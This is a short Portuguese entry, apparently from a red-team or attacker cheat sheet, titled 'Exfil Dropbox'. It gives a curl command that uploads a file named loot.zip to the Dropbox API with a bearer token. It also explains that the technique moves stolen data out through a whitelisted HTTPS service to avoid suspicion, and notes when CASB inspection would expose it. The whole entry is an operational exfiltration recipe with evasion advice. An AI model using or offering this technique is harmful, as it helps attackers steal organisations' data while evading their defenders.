Exfil Dropbox

curl -X POST https://content.dropboxapi.com/2/files/upload -H "Authorization: Bearer <token>" --data-binary @loot.zip

Carrega dados roubados para o Dropbox com a API e um token OAuth: o tráfego sai por HTTPS para um serviço legítimo da whitelist.

Execute quando o egress só permite HTTPS para serviços conhecidos e você quer extrair lotes médios (GB) sem levantar suspeitas: Dropbox, Google Drive e OneDrive estão em quase todas as whitelists corporativas. A API é direta com curl e não requer o cliente desktop.

Se a equipe azul usa CASB (Netskope, Zscaler) com inspeção TLS de APIs cloud, o upload fica registrado com o IP de origem e o volume. Também não use se o volume for enorme: a cota da conta limita o total.